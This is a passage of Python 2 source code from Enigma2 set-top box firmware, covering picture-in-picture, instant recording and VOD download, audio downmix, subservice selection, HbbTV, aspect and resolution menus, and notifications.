f = open("/proc/stb/vmpeg/1/dst_width", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_height", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_apply", "w")
f.write("1")
f.close()
else:
self.lastPiPService = None
self.session.pipshown = False
del self.session.pip
elif info:
self.session.open(MessageBox, _("Your %s %s does not support PiP HD") % (getMachineBrand(), getMachineName()), type = MessageBox.TYPE_INFO,timeout = 5 )
else:
self.session.open(MessageBox, _("No active channel found."), type = MessageBox.TYPE_INFO,timeout = 5 )
if self.session.pipshown and hasattr(self, "screenSaverTimer"):
self.screenSaverTimer.stop()
def clearLastPiPService(self):
self.lastPiPService = None
def activePiP(self):
if self.servicelist and self.servicelist.dopipzap or not self.session.pipshown:
self.showPiP()
else:
self.togglePipzap()
def activePiPName(self):
if self.servicelist and self.servicelist.dopipzap:
return _("Disable Picture in Picture")
if self.session.pipshown:
return _("Zap focus to Picture in Picture")
else:
return _("Activate Picture in Picture")
def swapPiP(self):
if self.pipShown():
swapservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
pipref = self.session.pip.getCurrentService()
if swapservice and pipref and pipref.toString() != swapservice.toString():
currentServicePath = self.servicelist.getCurrentServicePath()
currentBouquet = self.servicelist and self.servicelist.getRoot()
self.servicelist.setCurrentServicePath(self.session.pip.servicePath, doZap=False)
self.session.pip.playService(swapservice)
self.session.nav.stopService() # stop portal
self.session.nav.playService(pipref, checkParentalControl=False, adjust=False)
self.session.pip.servicePath = currentServicePath
self.session.pip.servicePath[1] = currentBouquet
if self.servicelist.dopipzap:
# This unfortunately won't work with subservices
self.servicelist.setCurrentSelection(self.session.pip.getCurrentService())
def movePiP(self):
if self.pipShown():
self.session.open(PiPSetup, pip = self.session.pip)
def pipDoHandle0Action(self):
use = config.usage.pip_zero_button.value
if "swap" == use:
self.swapPiP()
elif "swapstop" == use:
self.swapPiP()
self.showPiP()
elif "stop" == use:
self.showPiP()
class InfoBarInstantRecord():
def __init__(self):
self['InstantRecordActions'] = HelpableActionMap(self, 'InfobarInstantRecord', {'instantRecord': (self.instantRecord, _('Instant recording...'))})
self.SelectedInstantServiceRef = None
if isStandardInfoBar(self):
self.recording = []
else:
from Screens.InfoBar import InfoBar
InfoBarInstance = InfoBar.instance
if InfoBarInstance:
self.recording = InfoBarInstance.recording
self.saveTimeshiftEventPopupActive = False
return
def moveToTrash(self, entry):
print '[InfoBarGenerics] instantRecord stop and delete recording: ', entry.name
import Tools.Trashcan
trash = Tools.Trashcan.createTrashFolder(entry.Filename)
from MovieSelection import moveServiceFiles
moveServiceFiles(entry.Filename, trash, entry.name, allowCopy=False)
def stopCurrentRecording(self, entry = -1):
def confirm(answer = False):
if answer:
self.session.nav.RecordTimer.removeEntry(self.recording[entry])
if self.deleteRecording:
self.moveToTrash(self.recording[entry])
self.recording.remove(self.recording[entry])
if entry is not None and entry != -1:
msg = _('Stop recording:')
if self.deleteRecording:
msg = _('Stop and delete recording:')
msg += '\n'
msg += ' - ' + self.recording[entry].name + '\n'
self.session.openWithCallback(confirm, MessageBox, msg, MessageBox.TYPE_YESNO)
return
def stopAllCurrentRecordings(self, list):
def confirm(answer = False):
if answer:
for entry in list:
self.session.nav.RecordTimer.removeEntry(entry[0])
self.recording.remove(entry[0])
if self.deleteRecording:
self.moveToTrash(entry[0])
msg = _('Stop recordings:')
if self.deleteRecording:
msg = _('Stop and delete recordings:')
msg += '\n'
for entry in list:
msg += ' - ' + entry[0].name + '\n'
self.session.openWithCallback(confirm, MessageBox, msg, MessageBox.TYPE_YESNO)
def getProgramInfoAndEvent(self, info, name):
info["serviceref"] = hasattr(self, "SelectedInstantServiceRef") and self.SelectedInstantServiceRef or self.session.nav.getCurrentlyPlayingServiceOrGroup()
event = None
try:
epg = eEPGCache.getInstance()
event = epg.lookupEventTime(info["serviceref"], -1, 0)
if event is None:
if hasattr(self, "SelectedInstantServiceRef") and self.SelectedInstantServiceRef:
service_info = eServiceCenter.getInstance().info(self.SelectedInstantServiceRef)
event = service_info and service_info.getEvent(self.SelectedInstantServiceRef)
else:
service = self.session.nav.getCurrentService()
event = service and service.info().getEvent(0)
except:
pass
info["event"] = event
info["name"] = name
info["description"] = ""
info["eventid"] = None
if event is not None:
curEvent = parseEvent(event)
info["name"] = curEvent[2]
info["description"] = curEvent[3]
info["eventid"] = curEvent[4]
info["end"] = curEvent[1]
return
def startInstantRecording(self, limitEvent = False):
begin = int(time())
end = begin + 3600 # dummy
name = "instant record"
info = { }
self.getProgramInfoAndEvent(info, name)
serviceref = info["serviceref"]
event = info["event"]
if event is not None:
if limitEvent:
end = info["end"]
else:
if limitEvent:
self.session.open(MessageBox, _("No event info found, recording indefinitely."), MessageBox.TYPE_INFO)
if isinstance(serviceref, eServiceReference):
serviceref = ServiceReference(serviceref)
recording = RecordTimerEntry(serviceref, begin, end, info["name"], info["description"], info["eventid"], afterEvent = AFTEREVENT.AUTO, justplay = False, always_zap = False, dirname = preferredInstantRecordPath())
recording.dontSave = True
if event is None or limitEvent == False:
recording.autoincrease = True
recording.setAutoincreaseEnd()
simulTimerList = self.session.nav.RecordTimer.record(recording)
if simulTimerList is None: # no conflict
recording.autoincrease = False
self.recording.append(recording)
else:
if len(simulTimerList) > 1:
name = simulTimerList[1].name
name_date = ' '.join((name, strftime('%F %T', localtime(simulTimerList[1].begin))))
recording.autoincrease = True
if recording.setAutoincreaseEnd():
self.session.nav.RecordTimer.record(recording)
self.recording.append(recording)
self.session.open(MessageBox, _("Record time limited due to conflicting timer %s") % name_date, MessageBox.TYPE_INFO)
else:
self.session.open(MessageBox, _("Could not record due to conflicting timer %s") % name, MessageBox.TYPE_INFO)
else:
self.session.open(MessageBox, _("Could not record due to invalid service %s") % serviceref, MessageBox.TYPE_INFO)
recording.autoincrease = False
return
def isInstantRecordRunning(self):
if self.recording:
for x in self.recording:
if x.isRunning():
return True
return False
def recordQuestionCallback(self, answer):
if answer is None or answer[1] == "no":
self.saveTimeshiftEventPopupActive = False
return
else:
list = []
recording = self.recording[:]
for x in recording:
if x not in self.session.nav.RecordTimer.timer_list:
self.recording.remove(x)
elif x.dontSave and x.isRunning():
list.append((x, False))
self.deleteRecording = False
if answer[1] == 'changeduration':
if len(self.recording) == 1:
self.changeDuration(0)
else:
self.session.openWithCallback(self.changeDuration, TimerSelection, list)
elif answer[1] == 'addrecordingtime':
if len(self.recording) == 1:
self.addRecordingTime(0)
else:
self.session.openWithCallback(self.addRecordingTime, TimerSelection, list)
elif answer[1] == 'changeendtime':
if len(self.recording) == 1:
self.setEndtime(0)
else:
self.session.openWithCallback(self.setEndtime, TimerSelection, list)
elif answer[1] == 'timer':
import TimerEdit
self.session.open(TimerEdit.TimerEditList)
elif answer[1] == 'stop':
if len(self.recording) == 1:
self.stopCurrentRecording(0)
else:
self.session.openWithCallback(self.stopCurrentRecording, TimerSelection, list)
elif answer[1] == 'stopdelete':
self.deleteRecording = True
if len(self.recording) == 1:
self.stopCurrentRecording(0)
else:
self.session.openWithCallback(self.stopCurrentRecording, TimerSelection, list)
elif answer[1] == 'stopall':
self.stopAllCurrentRecordings(list)
elif answer[1] == 'stopdeleteall':
self.deleteRecording = True
self.stopAllCurrentRecordings(list)
elif answer[1] in ('indefinitely', 'manualduration', 'manualendtime', 'event'):
from Components.About import about
if len(list) >= 2 and about.getChipSetString() in ('meson-6', 'meson-64'):
Notifications.AddNotification(MessageBox, _('Sorry only possible to record 2 channels at once'), MessageBox.TYPE_ERROR, timeout=5)
return
self.startInstantRecording(limitEvent=answer[1] in ('event', 'manualendtime') or False)
if answer[1] == 'manualduration':
self.changeDuration(len(self.recording) - 1)
elif answer[1] == 'manualendtime':
self.setEndtime(len(self.recording) - 1)
elif answer[1] == 'savetimeshift':
if self.isSeekable() and self.pts_eventcount != self.pts_currplaying:
InfoBarTimeshift.SaveTimeshift(self, timeshiftfile='pts_livebuffer_%s' % self.pts_currplaying)
else:
Notifications.AddNotification(MessageBox, _('Timeshift will get saved at the end of an event!'), MessageBox.TYPE_INFO, timeout=5)
self.save_current_timeshift = True
config.timeshift.isRecording.value = True
elif answer[1] == 'savetimeshiftEvent':
InfoBarTimeshift.saveTimeshiftEventPopup(self)
elif answer[1].startswith('pts_livebuffer') is True:
InfoBarTimeshift.SaveTimeshift(self, timeshiftfile=answer[1])
elif answer[1] == 'downloadvod':
self.saveTimeshiftEventPopupActive = False
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
if url:
import urllib2
from OPENDROID.OPD_panel import FileDownloadJob
from Screens.TaskView import JobView
try:
u = urllib2.urlopen(url)
except:
self.session.open(MessageBox, _('The URL to this image is not correct !!'), type=MessageBox.TYPE_ERROR)
file_name = config.usage.vod_path.value + '/' + name.replace(' ', '_') + '.mkv'
f = open(file_name, 'wb')
f.close()
job = FileDownloadJob(url, file_name, name.replace(' ', '_'))
job.afterEvent = 'close'
job_manager.AddJob(job)
job_manager.in_background = True
self.session.open(MessageBox, _('Downloading starded - VOD: ' + name.replace('_', ' ')), MessageBox.TYPE_INFO, timeout=5)
else:
self.session.open(MessageBox, _('Downloading filed, test another VOD title'), MessageBox.TYPE_INFO, timeout=5)
if answer[1] != 'savetimeshiftEvent':
self.saveTimeshiftEventPopupActive = False
return
def setEndtime(self, entry):
if entry is not None and entry >= 0:
self.selectedEntry = entry
self.endtime = ConfigClock(default=self.recording[self.selectedEntry].end)
dlg = self.session.openWithCallback(self.TimeDateInputClosed, TimeDateInput, self.endtime)
dlg.setTitle(_('Please change the recording end time'))
return
def TimeDateInputClosed(self, ret):
if len(ret) > 1:
if ret[0]:
if self.recording[self.selectedEntry].end != ret[1]:
self.recording[self.selectedEntry].autoincrease = False
self.recording[self.selectedEntry].end = ret[1]
self.session.nav.RecordTimer.timeChanged(self.recording[self.selectedEntry])
def changeDuration(self, entry):
if entry is not None and entry >= 0:
self.selectedEntry = entry
self.session.openWithCallback(self.inputCallback, InputBox, title=_('How many minutes do you want to record for?'), text='5 ', maxSize=True, type=Input.NUMBER)
return
def addRecordingTime(self, entry):
if entry is not None and entry >= 0:
self.selectedEntry = entry
self.session.openWithCallback(self.inputAddRecordingTime, InputBox, title=_('How many minutes do you want add to the recording?'), text='5 ', maxSize=True, type=Input.NUMBER)
return
def inputAddRecordingTime(self, value):
if value:
print '[InfoBarGenerics] added', int(value), 'minutes for recording.'
entry = self.recording[self.selectedEntry]
if int(value) != 0:
entry.autoincrease = False
entry.end += 60 * int(value)
self.session.nav.RecordTimer.timeChanged(entry)
def inputCallback(self, value):
entry = self.recording[self.selectedEntry]
if value is not None:
print '[InfoBarGenerics] stopping recording after', int(value), 'minutes.'
if int(value) != 0:
entry.autoincrease = False
entry.end = int(time()) + 60 * int(value)
self.session.nav.RecordTimer.timeChanged(entry)
return
def isTimerRecordRunning(self):
identical = timers = 0
for timer in self.session.nav.RecordTimer.timer_list:
if timer.isRunning() and not timer.justplay:
timers += 1
if self.recording:
for x in self.recording:
if x.isRunning() and x == timer:
identical += 1
return timers > identical
def instantRecord(self, serviceRef = None):
self.SelectedInstantServiceRef = serviceRef
pirr = preferredInstantRecordPath()
if not findSafeRecordPath(pirr) and not findSafeRecordPath(defaultMoviePath()):
if not pirr:
pirr = ''
self.session.open(MessageBox, _('Missing ') + '\n' + pirr + '\n' + _('No HDD found or HDD not initialized!'), MessageBox.TYPE_ERROR)
return
if isStandardInfoBar(self):
commonVOD = ((_('Download (remember to switch to a channel DVB-S2/T/T2/C)'), 'downloadvod'), (_('Add recording (stop after current event)'), 'event'))
common = ((_('Add recording (stop after current event)'), 'event'),
(_('Add recording (indefinitely)'), 'indefinitely'),
(_('Add recording (enter recording duration)'), 'manualduration'),
(_('Add recording (enter recording endtime)'), 'manualendtime'))
timeshiftcommon = ((_('Timeshift save recording (stop after current event)'), 'savetimeshift'), (_('Timeshift save recording (Select event)'), 'savetimeshiftEvent'))
else:
common = ()
commonVOD = ()
timeshiftcommon = ()
if self.isInstantRecordRunning():
title = _('A recording is currently in progress.\nWhat do you want to do?')
list = common + ((_('Change recording (duration)'), 'changeduration'), (_('Change recording (add time)'), 'addrecordingtime'), (_('Change recording (end time)'), 'changeendtime'))
list += ((_('Stop recording'), 'stop'),)
if config.usage.movielist_trashcan.value:
list += ((_('Stop and delete recording'), 'stopdelete'),)
if len(self.recording) > 1:
list += ((_('Stop all current recordings'), 'stopall'),)
if config.usage.movielist_trashcan.value:
list += ((_('Stop and delete all current recordings'), 'stopdeleteall'),)
if self.isTimerRecordRunning():
list += ((_('Stop timer recording'), 'timer'),)
elif self.session.nav.getCurrentlyPlayingServiceReference():
name = self.session.nav.getCurrentlyPlayingServiceReference().toString().startswith('4097:')
if name == True:
title = _('Start recording?')
list = commonVOD
else:
title = _('Start recording?')
list = common
if self.isTimerRecordRunning():
list += ((_('Stop timer recording'), 'timer'),)
if isStandardInfoBar(self) and self.timeshiftEnabled():
list = list + timeshiftcommon
if isStandardInfoBar(self):
list = list + ((_('Do not record'), 'no'),)
else:
return 0
if list:
self.session.openWithCallback(self.recordQuestionCallback, ChoiceBox, title=title, list=list)
else:
return 0
class InfoBarAudioSelection:
def __init__(self):
self["AudioSelectionAction"] = HelpableActionMap(self, "InfobarAudioSelectionActions",
{
"audioSelection": (self.audioSelection, _("Audio options...")),
"audio_key": (self.audio_key, _("Audio options...")),
"audioSelectionLong": (self.audioDownmixToggle, _("Toggle Digital downmix...")),
})
def audioSelection(self):
from Screens.AudioSelection import AudioSelection
self.session.openWithCallback(self.audioSelected, AudioSelection, infobar=self)
def audio_key(self):
from Screens.AudioSelection import AudioSelection
self.session.openWithCallback(self.audioSelected, AudioSelection, infobar=self)
def audioSelected(self, ret=None):
print "[infobar::audioSelected]", ret
def audioDownmixToggle(self, popup = True):
if SystemInfo["CanDownmixAC3"]:
if config.av.downmix_ac3.value:
message = _("Dolby Digital downmix is now") + " " + _("disabled")
print '[Audio] Dolby Digital downmix is now disabled'
config.av.downmix_ac3.setValue(False)
else:
config.av.downmix_ac3.setValue(True)
message = _("Dolby Digital downmix is now") + " " + _("enabled")
print '[Audio] Dolby Digital downmix is now enabled'
if popup:
Notifications.AddPopup(text = message, type = MessageBox.TYPE_INFO, timeout = 5, id = "DDdownmixToggle")
def audioDownmixOn(self):
if not config.av.downmix_ac3.value:
self.audioDownmixToggle(False)
def audioDownmixOff(self):
if config.av.downmix_ac3.value:
self.audioDownmixToggle(False)
class InfoBarSubserviceSelection:
def __init__(self):
self["SubserviceSelectionAction"] = HelpableActionMap(self, "InfobarSubserviceSelectionActions",
{
"GreenPressed": (self.GreenPressed),
"subserviceSelection": (self.subserviceSelection),
})
self["SubserviceQuickzapAction"] = HelpableActionMap(self, "InfobarSubserviceQuickzapActions",
{
"nextSubservice": (self.nextSubservice, _("Switch to next sub service")),
"prevSubservice": (self.prevSubservice, _("Switch to previous sub service"))
}, -1)
self["SubserviceQuickzapAction"].setEnabled(False)
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedEventInfo: self.checkSubservicesAvail
})
self.onClose.append(self.__removeNotifications)
self.bsel = None
def GreenPressed(self):
if not config.plisettings.Subservice.value:
self.openTimerList()
else:
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
if not subservices or subservices.getNumberOfSubservices() == 0:
if fileExists("/usr/lib/enigma2/python/Plugins/Extensions/CustomSubservices/plugin.pyo"):
serviceRef = self.session.nav.getCurrentlyPlayingServiceReference()
subservices = self.getAvailableSubservices(serviceRef)
if not subservices or len(subservices) == 0:
self.openPluginBrowser()
else:
self.subserviceSelection()
else:
self.openPluginBrowser()
else:
self.subserviceSelection()
def openPluginBrowser(self):
try:
from Screens.PluginBrowser import PluginBrowser
self.session.open(PluginBrowser)
except:
pass
def __removeNotifications(self):
self.session.nav.event.remove(self.checkSubservicesAvail)
def checkSubservicesAvail(self):
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
if not subservices or subservices.getNumberOfSubservices() == 0:
self["SubserviceQuickzapAction"].setEnabled(False)
def nextSubservice(self):
self.changeSubservice(+1)
def prevSubservice(self):
self.changeSubservice(-1)
def changeSubservice(self, direction):
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
n = subservices and subservices.getNumberOfSubservices()
if n and n > 0:
selection = -1
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
idx = 0
while idx < n:
if subservices.getSubservice(idx).toString() == ref.toString():
selection = idx
break
idx += 1
if selection != -1:
selection += direction
if selection >= n:
selection=0
elif selection < 0:
selection=n-1
newservice = subservices.getSubservice(selection)
if newservice.valid():
del subservices
del service
self.session.nav.playService(newservice, False)
def subserviceSelection(self):
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
self.bouquets = self.servicelist.getBouquetList()
n = subservices and subservices.getNumberOfSubservices()
selection = 0
if n and n > 0:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
tlist = []
idx = 0
while idx < n:
i = subservices.getSubservice(idx)
if i.toString() == ref.toString():
selection = idx
tlist.append((i.getName(), i))
idx += 1
if self.bouquets and len(self.bouquets):
keys = ["red", "blue", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ] + [""] * n
if config.usage.multibouquet.value:
tlist = [(_("Quick zap"), "quickzap", service.subServices()), (_("Add to bouquet"), "CALLFUNC", self.addSubserviceToBouquetCallback), ("--", "")] + tlist
else:
tlist = [(_("Quick zap"), "quickzap", service.subServices()), (_("Add to favourites"), "CALLFUNC", self.addSubserviceToBouquetCallback), ("--", "")] + tlist
selection += 3
else:
tlist = [(_("Quick zap"), "quickzap", service.subServices()), ("--", "")] + tlist
keys = ["red", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ] + [""] * n
selection += 2
self.session.openWithCallback(self.subserviceSelected, ChoiceBox, title=_("Please select a sub service..."), list = tlist, selection = selection, keys = keys, skin_name = "SubserviceSelection")
def subserviceSelected(self, service):
del self.bouquets
if not service is None:
if isinstance(service[1], str):
if service[1] == "quickzap":
from Screens.SubservicesQuickzap import SubservicesQuickzap
self.session.open(SubservicesQuickzap, service[2])
else:
self["SubserviceQuickzapAction"].setEnabled(True)
self.session.nav.playService(service[1], False)
def addSubserviceToBouquetCallback(self, service):
if not service is None:
if len(service) > 1 and isinstance(service[1], eServiceReference):
self.selectedSubservice = service
if self.bouquets is None:
cnt = 0
else:
cnt = len(self.bouquets)
if cnt > 1: # show bouquet list
self.bsel = self.session.openWithCallback(self.bouquetSelClosed, BouquetSelector, self.bouquets, self.addSubserviceToBouquet)
elif cnt == 1: # add to only one existing bouquet
self.addSubserviceToBouquet(self.bouquets[0][1])
self.session.open(MessageBox, _("Service has been added to the favourites."), MessageBox.TYPE_INFO)
else:
self.session.open(MessageBox, _("Service cant been added to the favourites."), MessageBox.TYPE_INFO)
def bouquetSelClosed(self, confirmed):
self.bsel = None
del self.selectedSubservice
if confirmed:
self.session.open(MessageBox, _("Service has been added to the selected bouquet."), MessageBox.TYPE_INFO)
def addSubserviceToBouquet(self, dest):
self.servicelist.addServiceToBouquet(dest, self.selectedSubservice[1])
if self.bsel:
self.bsel.close(True)
else:
del self.selectedSubservice
def openTimerList(self):
self.session.open(TimerEditList)
from Components.Sources.HbbtvApplication import HbbtvApplication
gHbbtvApplication = HbbtvApplication()
class InfoBarRedButton:
def __init__(self):
self["RedButtonActions"] = HelpableActionMap(self, "InfobarRedButtonActions",
{
"activateRedButton": (self.activateRedButton, _("Red button...")),
})
self["HbbtvApplication"] = gHbbtvApplication
self.onHBBTVActivation = [ ]
self.onRedButtonActivation = [ ]
self.onReadyForAIT = [ ]
self.__et = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evHBBTVInfo: self.detectedHbbtvApplication,
iPlayableService.evUpdatedInfo: self.updateInfomation
})
def updateAIT(self, orgId=0):
for x in self.onReadyForAIT:
try:
x(orgId)
except Exception, ErrMsg:
print ErrMsg
#self.onReadyForAIT.remove(x)
def updateInfomation(self):
try:
self["HbbtvApplication"].setApplicationName("")
self.updateAIT()
except Exception, ErrMsg:
pass
def detectedHbbtvApplication(self):
service = self.session.nav.getCurrentService()
info = service and service.info()
try:
for x in info.getInfoObject(iServiceInformation.sHBBTVUrl):
print x
if x[0] in (-1, 1):
self.updateAIT(x[3])
self["HbbtvApplication"].setApplicationName(x[1])
break
except Exception, ErrMsg:
pass
def activateRedButton(self):
service = self.session.nav.getCurrentService()
info = service and service.info()
if info and info.getInfoString(iServiceInformation.sHBBTVUrl) != "":
for x in self.onHBBTVActivation:
x()
elif False: # TODO: other red button services
for x in self.onRedButtonActivation:
x()
class InfoBarTimerButton:
def __init__(self):
self["TimerButtonActions"] = HelpableActionMap(self, "InfobarTimerButtonActions",
{
"timerSelection": (self.timerSelection, _("Timer selection...")),
})
def timerSelection(self):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
class InfoBarAspectSelection:
STATE_HIDDEN = 0
STATE_ASPECT = 1
STATE_RESOLUTION = 2
def __init__(self):
self["AspectSelectionAction"] = HelpableActionMap(self, "InfobarAspectSelectionActions",
{
"aspectSelection": (self.ExGreen_toggleGreen, _("Aspect list...")),
})
self.__ExGreen_state = self.STATE_HIDDEN
def ExGreen_doAspect(self):
print "do self.STATE_ASPECT"
self.__ExGreen_state = self.STATE_ASPECT
self.aspectSelection()
def ExGreen_doResolution(self):
print "do self.STATE_RESOLUTION"
self.__ExGreen_state = self.STATE_RESOLUTION
self.resolutionSelection()
def ExGreen_doHide(self):
print "do self.STATE_HIDDEN"
self.__ExGreen_state = self.STATE_HIDDEN
def ExGreen_toggleGreen(self, arg=""):
print self.__ExGreen_state
if self.__ExGreen_state == self.STATE_HIDDEN:
print "self.STATE_HIDDEN"
self.ExGreen_doAspect()
elif self.__ExGreen_state == self.STATE_ASPECT:
print "self.STATE_ASPECT"
self.ExGreen_doResolution()
elif self.__ExGreen_state == self.STATE_RESOLUTION:
print "self.STATE_RESOLUTION"
self.ExGreen_doHide()
def aspectSelection(self):
selection = 0
tlist= [(_("Resolution"), "resolution"),("--", ""),(_("4_3_letterbox"), "0"), (_("4_3_panscan"), "1"), (_("16_9"), "2"), (_("16_9_always"), "3"), (_("16_10_letterbox"), "4"), (_("16_10_panscan"), "5"), (_("16_9_letterbox"), "6")]
for x in range(len(tlist)):
selection = x
keys = ["green", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ]
self.session.openWithCallback(self.aspectSelected, ChoiceBox, title=_("Please select an aspect ratio..."), list = tlist, selection = selection, keys = keys)
def aspectSelected(self, aspect):
if not aspect is None:
if isinstance(aspect[1], str):
if aspect[1] == "":
self.ExGreen_doHide()
elif aspect[1] == "resolution":
self.ExGreen_toggleGreen()
else:
from Components.AVSwitch import AVSwitch
iAVSwitch = AVSwitch()
iAVSwitch.setAspectRatio(int(aspect[1]))
self.ExGreen_doHide()
else:
self.ExGreen_doHide()
return
class InfoBarResolutionSelection:
def __init__(self):
return
def resolutionSelection(self):
f = open("/proc/stb/vmpeg/0/xres", "r")
xresString = f.read()
f.close()
f = open("/proc/stb/vmpeg/0/yres", "r")
yresString = f.read()
f.close()
if getBoxType().startswith('azbox'):
fpsString = '50000'
else:
try:
f = open("/proc/stb/vmpeg/0/framerate", "r")
fpsString = f.read()
f.close()
except:
print"[InfoBarResolutionSelection] Error open /proc/stb/vmpeg/0/framerate !!"
fpsString = '50000'
xres = int(xresString, 16)
yres = int(yresString, 16)
fps = int(fpsString)
fpsFloat = float(fps)
fpsFloat = fpsFloat/1000
# do we need a new sorting with this way here?
# or should we disable some choices?
choices = []
if os.path.exists("/proc/stb/video/videomode_choices"):
f = open("/proc/stb/video/videomode_choices")
values = f.readline().replace("\n", "").replace("pal ", "").replace("ntsc ", "").split(" ", -1)
for x in values:
entry = x.replace('i50', 'i@50hz').replace('i60', 'i@60hz').replace('p23', 'p@23.976hz').replace('p24', 'p@24hz').replace('p25', 'p@25hz').replace('p29', 'p@29hz').replace('p30', 'p@30hz').replace('p50', 'p@50hz'), x
choices.append(entry)
f.close()
selection = 0
tlist = []
tlist.append((_("Exit"), "exit"))
tlist.append((_("Auto(not available)"), "auto"))
tlist.append((_("Video: ") + str(xres) + "x" + str(yres) + "@" + str(fpsFloat) + "hz", ""))
tlist.append(("--", ""))
if choices != []:
for x in choices:
tlist.append(x)
keys = ["green", "yellow", "blue", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ]
mode = open("/proc/stb/video/videomode").read()[:-1]
print mode
for x in range(len(tlist)):
if tlist[x][1] == mode:
selection = x
self.session.openWithCallback(self.ResolutionSelected, ChoiceBox, title=_("Please select a resolution..."), list = tlist, selection = selection, keys = keys)
def ResolutionSelected(self, Resolution):
if not Resolution is None:
if isinstance(Resolution[1], str):
if Resolution[1] == "exit" or Resolution[1] == "" or Resolution[1] == "auto":
self.ExGreen_toggleGreen()
if Resolution[1] != "auto":
f = open("/proc/stb/video/videomode", "w")
f.write(Resolution[1])
f.close()
#from enigma import gMainDC
#gMainDC.getInstance().setResolution(-1, -1)
self.ExGreen_doHide()
else:
self.ExGreen_doHide()
return
class InfoBarVmodeButton:
def __init__(self):
self["VmodeButtonActions"] = HelpableActionMap(self, "InfobarVmodeButtonActions",
{
"vmodeSelection": (self.vmodeSelection, _("Letterbox zoom")),
})
def vmodeSelection(self):
self.session.open(VideoMode)
class VideoMode(Screen):
def __init__(self,session):
Screen.__init__(self, session)
self["videomode"] = Label()
self["actions"] = NumberActionMap( [ "InfobarVmodeButtonActions" ],
{
"vmodeSelection": self.selectVMode
})
self.Timer = eTimer()
self.Timer.callback.append(self.quit)
self.selectVMode()
def selectVMode(self):
policy = config.av.policy_43
if self.isWideScreen():
policy = config.av.policy_169
idx = policy.choices.index(policy.value)
idx = (idx + 1) % len(policy.choices)
policy.value = policy.choices[idx]
self["videomode"].setText(policy.value)
self.Timer.start(1000, True)
def isWideScreen(self):
from Components.Converter.ServiceInfo import WIDESCREEN
service = self.session.nav.getCurrentService()
info = service and service.info()
return info.getInfo(iServiceInformation.sAspect) in WIDESCREEN
def quit(self):
self.Timer.stop()
self.close()
class InfoBarAdditionalInfo:
def __init__(self):
self["RecordingPossible"] = Boolean(fixed=harddiskmanager.HDDCount() > 0)
self["TimeshiftPossible"] = self["RecordingPossible"]
self["ExtensionsAvailable"] = Boolean(fixed=1)
# TODO: these properties should be queried from the input device keymap
self["ShowTimeshiftOnYellow"] = Boolean(fixed=0)
self["ShowAudioOnYellow"] = Boolean(fixed=0)
self["ShowRecordOnRed"] = Boolean(fixed=0)
class InfoBarNotifications:
def __init__(self):
self.onExecBegin.append(self.checkNotifications)
Notifications.notificationAdded.append(self.checkNotificationsIfExecing)
self.onClose.append(self.__removeNotification)
def __removeNotification(self):
Notifications.notificationAdded.remove(self.checkNotificationsIfExecing)
def checkNotificationsIfExecing(self):
if self.execing:
self.checkNotifications()
def checkNotifications(self):
notifications = Notifications.notifications
if notifications:
n = notifications[0]
del notifications[0]
cb = n[0]
if n[3].has_key("onSessionOpenCallback"):
n[3]["onSessionOpenCallback"]()
del n[3]["onSessionOpenCallback"]
if cb:
dlg = self.session.openWithCallback(cb, n[1], *n[2], **n[3])
elif not Notifications.current_notifications and n[4] == "ZapError":
if n[3].has_key("timeout"):
del n[3]["timeout"]
n[3]["enable_input"] = False
dlg = self.session.instantiateDialog(n[1], *n[2], **n[3])
self.hide()
dlg.show()
self.notificationDialog = dlg
eActionMap.getInstance().bindAction('', -maxint - 1, self.keypressNotification)
else:
dlg = self.session.open(n[1], *n[2], **n[3])
# remember that this notification is currently active
d = (n[4], dlg)
Notifications.current_notifications.append(d)
dlg.onClose.append(boundFunction(self.__notificationClosed, d))
def closeNotificationInstantiateDialog(self):
if hasattr(self, "notificationDialog"):
self.session.deleteDialog(self.notificationDialog)
del self.notificationDialog
eActionMap.getInstance().unbindAction('', self.keypressNotification)
def keypressNotification(self, key, flag):
if flag:
self.closeNotificationInstantiateDialog()
def __notificationClosed(self, d):
Notifications.current_notifications.remove(d)
class InfoBarServiceNotifications:
def __init__(self):
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evEnd: self.serviceHasEnded
})
def serviceHasEnded(self):
# print "service end!"
try:
self.setSeekState(self.SEEK_STATE_PLAY)
except:
pass
class InfoBarCueSheetSupport:
CUT_TYPE_IN = 0
CUT_TYPE_OUT = 1
CUT_TYPE_MARK = 2
CUT_TYPE_LAST = 3
ENABLE_RESUME_SUPPORT = False
def __init__(self, actionmap = "InfobarCueSheetActions"):
self["CueSheetActions"] = HelpableActionMap(self, actionmap,
{
"jumpPreviousMark": (self.jumpPreviousMark, _("Jump to previous marked position")),
"jumpNextMark": (self.jumpNextMark, _("Jump to next marked position")),
"toggleMark": (self.toggleMark, _("Toggle a cut mark at the current position"))
}, prio=1)
self.cut_list = [ ]
self.is_closing = False
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evStart: self.__serviceStarted,
iPlayableService.evCuesheetChanged: self.downloadCuesheet,
})
def __serviceStarted(self):
if self.is_closing:
return
# print "new service started! trying to download cuts!"
self.downloadCuesheet()
self.resume_point = None
if self.ENABLE_RESUME_SUPPORT:
for (pts, what) in self.cut_list:
if what == self.CUT_TYPE_LAST:
last = pts
break
else:
last = getResumePoint(self.session)
if last is None:
return
# only resume if at least 10 seconds ahead, or <10 seconds before the end.
seekable = self.__getSeekable()
if seekable is None:
return # Should not happen?
length = seekable.getLength() or (None,0)
# print "seekable.getLength() returns:", length
# Hmm, this implies we don't resume if the length is unknown...
if (last > 900000) and (not length[1] or (last < length[1] - 900000)):
